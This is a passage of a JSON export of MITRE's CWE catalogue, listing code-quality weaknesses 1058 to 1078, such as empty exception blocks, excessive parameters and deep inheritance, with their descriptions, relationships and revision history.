Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1058":{"attr":{"@_ID":"1058","@_Name":"Invokable Control Element in Multi-Thread Context with non-Final Static Storable or Member Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code contains a function or method that\\n\\t\\t operates in a multi-threaded environment but owns an unsafe non-final\\n\\t\\t                     static storable or member data element.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-11"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-11"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"1059":{"attr":{"@_ID":"1059","@_Name":"Incomplete Documentation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The documentation, whether on paper or in electronic form, does\\n\\t\\t\\t\\t\\tnot contain descriptions of all the relevant elements of the product, such as\\n\\t\\t\\t\\t\\tits usage, structure, interfaces, design, implementation, configuration,\\n\\t\\t\\t\\t\\toperation, etc.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1060":{"attr":{"@_ID":"1060","@_Name":"Excessive Number of Inefficient Server-Side Data Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs too many data queries without using efficient data processing functionality such as stored procedures.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly due to computational expense.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"too many data queries\\" may vary for each product or developer, CISQ recommends a default maximum of 5 data queries for an inefficient function/procedure."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-9"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-9"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1061":{"attr":{"@_ID":"1061","@_Name":"Insufficient Encapsulation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-969"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1062":{"attr":{"@_ID":"1062","@_Name":"Parent Class with References to Child Class","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code has a parent class that contains references to a child class, its methods, or its members.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1061","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-14"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-14"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1063":{"attr":{"@_ID":"1063","@_Name":"Creation of Class Instance within a Static Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A static code block creates an instance of a class.","Extended_Description":{"xhtml:p":["This pattern identifies situations where a storable data element or member data element is initialized with a value in a block of code which is declared as static.","This issue can make the software perform more slowly by performing initialization before it is needed.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1064":{"attr":{"@_ID":"1064","@_Name":"Invokable Control Element with Signature Containing an Excessive Number of Parameters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a function, subroutine, or method whose signature has an unnecessarily large number of\\n\\t\\t\\t\\t\\tparameters/arguments.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parameters.\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parameters/arguments."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-13"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-13"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1065":{"attr":{"@_ID":"1065","@_Name":"Runtime Resource Management Control Element in a Component Built to Run on Application Servers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The application uses deployed components from application servers, but it also uses low-level functions/methods for management of resources, instead of the API provided by the application server.","Extended_Description":{"xhtml:p":"This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1066":{"attr":{"@_ID":"1066","@_Name":"Missing Serialization Control Element","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable data element that does not\\n\\t\\t\\t\\t\\thave an associated serialization method.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably, e.g. by triggering an exception.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-2"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-2"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1067":{"attr":{"@_ID":"1067","@_Name":"Excessive Execution of Sequential Searches of Data Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a data query against an SQL table or view\\n\\t\\t\\t\\t\\tthat is configured in a way that does not utilize an index and may cause\\n\\t\\t\\t\\t\\tsequential searches to be performed.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1176","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-5"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-5"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1068":{"attr":{"@_ID":"1068","@_Name":"Inconsistency Between Implementation and Documented Design","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The implementation of the product is not consistent with the\\n\\t\\t\\t\\t\\tdesign as described within the relevant documentation.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-963"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1069":{"attr":{"@_ID":"1069","@_Name":"Empty Exception Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"An invokable code block contains an exception handling block that does not contain any code, i.e. is empty.","Extended_Description":{"xhtml:p":"When an exception handling block (such as a Catch and Finally block) is used, but that block is empty, this can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1071","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1070":{"attr":{"@_ID":"1070","@_Name":"Serializable Data Element Containing non-Serializable Item Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a serializable, storable data element such as a field or member,\\n\\t\\t\\t\\t\\tbut the data element contains member elements that are not\\n\\t\\t\\t\\t\\tserializable.","Extended_Description":{"xhtml:p":["This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability.","As examples, the serializable nature of a data element comes from a serializable SerializableAttribute attribute in .NET and the inheritance from the java.io.Serializable interface in Java."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-3"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-3"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1071":{"attr":{"@_ID":"1071","@_Name":"Empty Code Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code contains a block that does not contain any code, i.e., the block is empty.","Extended_Description":{"xhtml:p":"Empty code blocks can occur in the bodies of conditionals, function or method definitions, exception handlers, etc.  While an empty code block might be intentional, it might also indicate incomplete implementation, accidental code deletion, unexpected macro expansion, etc.  For some programming languages and constructs, an empty block might be allowed by the syntax, but the lack of any behavior within the block might violate a convention or API in such a way that it is an error."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}}},"1072":{"attr":{"@_ID":"1072","@_Name":"Data Resource Access without Use of Connection Pooling","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software accesses a data resource through a database without using a\\n\\t\\t\\t\\t\\tconnection pooling capability.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, as connection pools allow connections to be reused without the overhead and time consumption of opening and closing a new connection.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-13"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-13"}},{"attr":{"@_External_Reference_ID":"REF-974"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1073":{"attr":{"@_ID":"1073","@_Name":"Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.","Extended_Description":{"xhtml:p":["This issue can make the software perform more slowly.  If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability.","While the interpretation of \\"large number of data accesses/queries\\" may vary for each product or developer, CISQ recommends a default maximum of 2 data accesses per function/method."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Performance"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCPEM"},"Entry_ID":"ASCPEM-PRF-10"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-959","@_Section":"ASCPEM-PRF-10"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1074":{"attr":{"@_ID":"1074","@_Name":"Class with Excessively Deep Inheritance","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A class has an inheritance level that is too high, i.e., it\\n\\t\\t\\t\\t\\thas a large number of parent classes.","Extended_Description":{"xhtml:p":["This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities.","While the interpretation of \\"large number of parent classes\\" may vary for each product or developer, CISQ recommends a default maximum of 7 parent classes."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1093","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-17"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-17"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1075":{"attr":{"@_ID":"1075","@_Name":"Unconditional Control Flow Transfer outside of Switch Block","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs unconditional control transfer (such as a\\n\\t\\t\\t\\t\\t\\"goto\\") in code outside of a branching structure such as a switch\\n\\t\\t\\t\\t\\tblock.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1120","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCMM"},"Entry_ID":"ASCMM-MNT-1"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-960","@_Section":"ASCMM-MNT-1"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"1076":{"attr":{"@_ID":"1076","@_Name":"Insufficient Adherence to Expected Conventions","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture, source code, design, documentation,\\n\\t\\t\\t\\t\\tor other artifact does not follow required conventions.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1077":{"attr":{"@_ID":"1077","@_Name":"Floating Point Comparison with Incorrect Operator","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code performs a comparison such as an\\n        equality test between two float (floating point) values, but\\n        it uses comparison operators that do not account for the\\n        possibility of loss of precision.","Extended_Description":{"xhtml:p":["Numeric calculation using floating point values\\n\\t   can generate imprecise results because of rounding errors.\\n\\t   As a result, two different calculations might generate\\n\\t   numbers that are mathematically equal, but have slightly\\n\\t   different bit representations that do not translate to the\\n\\t   same mathematically-equal values.  As a result, an equality\\n\\t   test or other comparison might produce unexpected\\n\\t   results.","This issue can prevent the software from running reliably.  If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Reliability"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-RLB-9"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-961","@_Section":"ASCRM-RLB-9"}},{"attr":{"@_External_Reference_ID":"REF-975"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}}},"1078":{"attr":{"@_ID":"1078","@_Name":"Inappropriate Source Code Style or Formatting","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code does not follow\\n\\t\\t\\t\\tdesired style or formatting for indentation, white\\n\\t\\t\\t\\tspace, comments, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1076","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."},"Modification":{"Modification_Name":"CWE Content 